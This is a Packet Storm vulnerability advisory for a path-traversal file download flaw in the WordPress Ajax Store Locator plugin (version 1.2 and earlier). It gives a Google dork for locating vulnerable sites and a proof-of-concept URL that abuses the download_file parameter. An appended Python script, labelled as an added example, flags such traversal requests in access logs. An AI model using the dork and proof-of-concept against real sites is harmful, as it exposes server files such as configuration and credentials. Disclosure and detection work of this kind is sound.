WordPress Ajax Store Locator 1.2 Arbitrary File Download

2014-12-07T00:00:00
ID PACKETSTORM:129408
Type packetstorm
Reporter Claudio Viviani
Modified 2014-12-07T00:00:00

Description

                                        
`######################  
  
# Exploit Title : WordPress Ajax Store Locator <= 1.2 Arbitrary File Download  
  
# Exploit Author : Claudio Viviani  
  
# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356  
  
# Software Link : Premium  
  
# Dork Google: inurl:ajax-store-locator  
# index of ajax-store-locator   
  
# Date : 2014-12-06  
  
# Tested on : Windows 7 / Mozilla Firefox  
# Linux / Mozilla Firefox  
  
######################  
  
# PoC Exploit:  
  
http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../filename]  
  
The "download_file" parameter is not sanitized, so path traversal sequences in it allow downloading files outside the plugin directory.  
  
  
#####################  
  
Discovered By : Claudio Viviani  
http://www.homelab.it  
  
info@homelab.it  
homelabit@protonmail.ch  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww  
  
#####################  
`
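
Added example (not part of the original advisory or the plugin's code): a log check that flags requests to sl_file_download.php whose download_file value contains directory traversal or an absolute path. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "sl_file_download.php"  # script named in the advisory
PARAM = "download_file"            # unsanitized parameter named in the advisory
# Request part of a combined-format access log entry (assumed log format)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding, stopping once the value is stable."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the value climbs out of its directory or is an absolute path."""
    v = fully_decode(value).replace("\\", "/")
    if v.startswith("/") or re.match(r"^[A-Za-z]:/", v):
        return True
    return ".." in v.split("/")

def suspicious_requests(log_lines):
    """Return (client_ip, decoded_value) for every flagged request."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + ENDPOINT):
            continue
        # parse_qs performs the first round of percent-decoding
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if is_traversal(value):
                hits.append((line.split()[0], fully_decode(value)))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
BASE = "/wp-content/plugins/ajax-store-locator-wordpress_0/" + ENDPOINT
SAMPLE_LOG = [
    f'203.0.113.7 - - [06/Dec/2014:10:01:02 +0000] "GET {BASE}?{PARAM}=../../example.conf HTTP/1.1" 200 512',
    f'198.51.100.4 - - [06/Dec/2014:10:02:10 +0000] "GET {BASE}?{PARAM}=stores.csv HTTP/1.1" 200 2048',
    f'203.0.113.9 - - [06/Dec/2014:10:03:44 +0000] "GET {BASE}?{PARAM}=..%2f..%2fexample.conf HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(ip, value)
```

A 200 response on a flagged line is the case to investigate first, since it suggests the file was actually served.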